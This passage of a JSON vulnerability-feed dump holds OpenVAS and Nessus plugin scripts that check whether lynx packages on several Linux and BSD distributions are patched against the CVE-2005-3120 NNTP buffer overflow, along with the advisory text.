http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your lynx package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20874-1\";\ntag_summary = \"The remote host is missing an update to lynx\nannounced via advisory DSA 874-1.\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. 
During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.3.\";\n\n\nif(description)\n{\n script_id(55750);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:03:37 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 874-1 (lynx)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lynx\", ver:\"2.8.4.1b-3.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lynx\", ver:\"2.8.5-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:09", "bulletinFamily": "scanner", "description": "The 
remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-22T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55743", "id": "OPENVAS:55743", "title": "FreeBSD Ports: lynx", "type": "openvas", "sourceData": "#\n#VID c01170bf-4990-11da-a1b8-000854d03344\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: lynx\n\nCVE-2005-3120\nStack-based buffer overflow in the HTrjis function in Lynx 2.8.6 and\nearlier allows remote NNTP servers to execute arbitrary code via\ncertain article headers that cause Lynx to add extra escape (ESC)\ncharacters.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html\nhttp://www.vuxml.org/freebsd/c01170bf-4990-11da-a1b8-000854d03344.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(55743);\n script_version(\"$Revision: 4128 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-22 07:37:51 +0200 (Thu, 22 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: lynx\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"lynx\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.8.5_1\")<0) {\n txt += 'Package lynx version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"2.8.6*\")>0 && revcomp(a:bver, b:\"2.8.6d14\")<0) {\n txt += 'Package lynx version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:51:00", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2005-310-03.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55806", "id": "OPENVAS:55806", "title": "Slackware Advisory SSA:2005-310-03 lynx", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2005_310_03.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New Lynx packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\nand -current to fix a security issue. 
An overflow could result in the\nexecution of arbitrary code when using Lynx to connect to a malicious NNTP\nserver.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2005-310-03.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2005-310-03\";\n \nif(description)\n{\n script_id(55806);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2005-310-03 lynx\";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i386-1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i386-1\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", 
rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "description": "The remote host is missing an update to lynx-ssl\nannounced via advisory DSA 876-1.\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.2.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55752", "id": "OPENVAS:55752", "title": "Debian Security Advisory DSA 876-1 (lynx-ssl)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_876_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 876-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1 of lynx.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your lynx-ssl package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20876-1\";\ntag_summary = \"The remote host is missing an update to lynx-ssl\nannounced via advisory DSA 876-1.\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.2.\";\n\n\nif(description)\n{\n script_id(55752);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:03:37 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 876-1 (lynx-ssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lynx-ssl\", ver:\"2.8.4.1b-3.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:54", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200510-15.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55658", "id": "OPENVAS:55658", "title": "Gentoo Security Advisory GLSA 200510-15 (Lynx)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Lynx contains a buffer overflow that may be exploited to execute arbitrary\ncode.\";\ntag_solution = \"All Lynx users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200510-15\nhttp://bugs.gentoo.org/show_bug.cgi?id=108451\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200510-15.\";\n\n \n\nif(description)\n{\n script_id(55658);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200510-15 (Lynx)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-client/lynx\", unaffected: make_list(\"ge 2.8.5-r1\"), vulnerable: make_list(\"lt 2.8.5-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:58", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2005-310-03.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231055806", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231055806", "title": "Slackware Advisory SSA:2005-310-03 lynx", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2005_310_03.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.55806\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2005-310-03 lynx\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0|10\\.1|10\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2005-310-03\");\n\n script_tag(name:\"insight\", value:\"New Lynx packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\nand -current to fix a security issue. An overflow could result in the\nexecution of arbitrary code when using Lynx to connect to a malicious NNTP\nserver.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2005-310-03.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i386-1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i386-1\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"lynx\", ver:\"2.8.5rel.5-i486-1\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2017-07-24T12:50:06", "bulletinFamily": "scanner", "description": "The remote host is missing an update to lynx-ssl\nannounced via advisory DSA 1085-1.\n\n\nSeveral vulnerabilities have been discovered in lynx, the popular\ntext-mode WWW browser. The Common Vulnerabilities and Exposures\nProject identifies the following vulnerabilities:\n\nCVE-2004-1617\n\nMichal Zalewski discovered that lynx is not able to grok invalid\nHTML including a TEXTAREA tag with a large COLS value and a large\ntag name in an element that is not terminated, and loops forever\ntrying to render the broken HTML.\n\nCVE-2005-3120\n\nUlf H\u00e4rnhammar discovered a buffer overflow that can be remotely\nexploited. During the handling of Asian characters when connecting\nto an NNTP server lynx can be tricked to write past the boundary\nof a buffer which can lead to the execution of arbitrary code.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 2.8.5-2.5woody1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=56855", "id": "OPENVAS:56855", "title": "Debian Security Advisory DSA 1085-1 (lynx-ssl)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1085_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1085-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 2.8.6-9sarge1.\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\nWe recommend that you upgrade your lynx-cur package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201085-1\";\ntag_summary = \"The remote host is missing an update to lynx-ssl\nannounced via advisory DSA 1085-1.\n\n\nSeveral vulnerabilities have been discoverd in lynx, the popular\ntext-mode WWW browser. The Common Vulnerabilities and Exposures\nProject identifies the following vulnerabilities:\n\nCVE-2004-1617\n\nMichal Zalewski discovered that lynx is not able to grok invalid\nHTML including a TEXTAREA tag with a large COLS value and a large\ntag name in an element that is not terminated, and loops forever\ntrying to render the broken HTML.\n\nCVE-2005-3120\n\nUlf H\u00e4rnhammar discovered a buffer overflow that can be remotely\nexploited. 
During the handling of Asian characters when connecting\nto an NNTP server lynx can be tricked to write past the boundary\nof a buffer which can lead to the execution of arbitrary code.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 2.8.5-2.5woody1.\";\n\n\nif(description)\n{\n script_id(56855);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-1617\", \"CVE-2005-3120\");\n script_bugtraq_id(11443);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1085-1 (lynx-ssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lynx-cur-wrapper\", ver:\"2.8.5-2.5woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lynx-cur\", ver:\"2.8.5-2.5woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lynx-cur-wrapper\", ver:\"2.8.6-9sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lynx-cur\", ver:\"2.8.6-9sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") 
{\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-12-13T07:01:19", "bulletinFamily": "scanner", "description": "Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-876.NASL", "href": "https://www.tenable.com/plugins/nessus/22742", "published": "2006-10-14T00:00:00", "title": "Debian DSA-876-1 : lynx-ssl - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-876. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22742);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:19\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"DSA\", value:\"876\");\n\n script_name(english:\"Debian DSA-876-1 : lynx-ssl - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. 
